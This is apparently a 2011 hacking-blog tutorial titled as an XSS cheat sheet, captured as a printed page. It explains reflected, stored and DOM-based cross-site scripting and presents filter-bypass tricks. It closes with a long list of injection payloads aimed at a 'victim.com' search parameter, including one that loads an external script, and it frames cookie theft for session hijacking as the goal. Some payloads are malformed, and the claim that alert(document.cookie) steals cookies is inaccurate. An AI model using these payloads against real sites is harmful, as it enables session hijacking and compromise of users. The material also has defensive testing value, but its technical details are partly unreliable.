Professional Documents
Culture Documents
Cross Site Scripting (XSS) Cheat Sheet - Readers Choice!! Hacking Alert
Cross Site Scripting (XSS) Cheat Sheet - Readers Choice!! Hacking Alert
11:04 PM cracking, hacking, hacking tutorial, sql injection tool, xss attack
8 comments
OWASP lists sql injection and XSS as the two most common vulnerabilities in web
pages and web apps. We have covered SQL injection quiet extensively so I decided
to write on xss.
Cross Site Scripting or XSS is a web application attack that involves injecting a
piece of malicious code into the vulnerable web application/web page. The attacker
injects a client side script mainly through the web browser to reach the other users of
the particular website. This attack can open several doors for the attacker ranging
from session hijacking to entire database compromise.
This attack is more dangerous and complicated compared to reflected XSS attack. In
Stored or persistent XSS attack, the vulnerable script is stored on the target server
and is activated once another user clicks on it. For example, consider a forum where
the attacker posts a message containing a link to malicious script. Another user
when views the message and clicks it, then the script activates and causes
respective attack.
The attacker can craft a malicious script like a cookie stealing script of the form
<script>alert(document.cookie);</script> and steal victims cookies to perform
session hijacking.
1 of 4 6/13/17, 4:47 PM
Cross site scripting(XSS) Cheat Sheet - Readers Choice!! ~ Hacking Alert http://hackingalert.blogspot.fr/2011/12/cross-site-scripting-cheat-sheet...
DOM or document object model based XSS attacks tries to exploit the structure of
the page in which they reside. The attacker tries to trick the browser to execute the
JavaScript or HTML code of his choice. Unlike the other two XSS attacks, DOM
based attack takes the advantage of vulnerable javascript which executes directly in
the users browser.
Consider the following piece of code:
<html><font color="Red"><b>Pwned</b></font></html>
<script>alert('xss')</script>
"><script>alert('xss')</script>
Now we notice, the above script we used for filtration is evolving only a few strings,
knowing there are bunch of ways and
strings to inject a malicious request.
It's only filtering '< > /' means leaving hackers with a vast amount of other strings to
inject a malicious code.
Now the question is since '<' and '>' are filtered, how we will be able to send a
javascript or html code injection?
Well, the answer is quite easy, javascript can be executed using ' and " before the
orignal script.
For instance,
')alert('xss');
Secondly,
");alert('xss');
Some webmasters filter lot more than this, especially it's filtered on important sites
like gov and org sites.
But all depends on their pattern if they are doing this in javascript, we will of course
just alter the page but what if the filtration is not in javascript, instead is in html or
php or even asp.
There's nothing impossible, we will try to get as much info about the filtration as
much we can.
Supposing a server that have filtered all strings just more than common in a way that
it reads the malicious string in the beginning or in the end to avoid and abort it, this
of course can be bypassed too!
helloworld<script>alert('xss')</script>
The above script will bypass filtration for the server that reads the malicious string in
the beginning.
2 of 4 6/13/17, 4:47 PM
Cross site scripting(XSS) Cheat Sheet - Readers Choice!! ~ Hacking Alert http://hackingalert.blogspot.fr/2011/12/cross-site-scripting-cheat-sheet...
helloworld<script>alert('xss')<script>helloworld
This will bypass filtration on server that reads whether in the beginning or in the end
or at both ends!
Mostly, this kind of filtration isn't common, so cant be of much use.
Some webmasters also filter the word 'xss' so it's likely to use some other message
for making an alert.
<script>alert('hello world')</script>
Some webmasters just simply define a pattern of a cross-site scripting script that is
possibly common.
In this case, I will mention here the full array of strings to inject, bypassing the
filtration.
victim.com/search.php?query="><script>alert('hello world')</script>
victim.com/search.php?query="><script>alert("hello world")</script>
victim.com/search.php?query="><script>alert("hello world");</script>
victim.com/search.php?query="><script>alert(/hello world");</script>
victim.com/search.php?query=//"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc<script>alert(/hello world/);</script>
victim.com/search.php?query=abc"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc"></script><script>alert(/hello world/);</script>
victim.com/search.php?query=abc//abc"></script>alert(/hello world/);</script>
victim.com/search.php?query=000"><script></script><script>alert(1337);</script>
victim.com/search.php?query=000abc</script><script>alert(/1337/);</script>
victim.com/search.php?query=--<script>"></script>alert(/1337/);</script>
victim.com/search.php?query=pwned<script>document.write('abc');</script>
victim.com/search.php?query=pwned</script><script>document.write(1337);
</script>
victim.com/search.php?query=pwned')alert(1337);//
victim.com/search.php?query=pwned";)alert(1337);//
victim.com/search.php?query=pwned");alert(/pwned/);//
victim.com/search.php?query=pwned//"></script>
<script>location.href='javascript:alert(/pwned/);</script>
victim.com/search.php?query="><img src='javascript:alert('xss');'>
victim.com/search.php?query="><script src='http://malicous js'</script>
These are a few simple and advanced scripts that can be used to check for XSS
vulnerability. There are several automatic tools available as well but I would
recommend that you first learn the manual method so that you can clearly
understand the attack vector. Later on you can switch to automatic tools. In case you
know any other XSS script that is missing in this tutorial then you can add in the
comment box and I will update it in this tutorial along with your name.
Special Thanks : str0ke,USMAN,tushy,Hackman,shubham,Fix
DARKLORD!!
8 comments:
3 of 4 6/13/17, 4:47 PM
Cross site scripting(XSS) Cheat Sheet - Readers Choice!! ~ Hacking Alert http://hackingalert.blogspot.fr/2011/12/cross-site-scripting-cheat-sheet...
http://hackxfbx.blogspot.in/
OR
Comment as:
Publish
4 of 4 6/13/17, 4:47 PM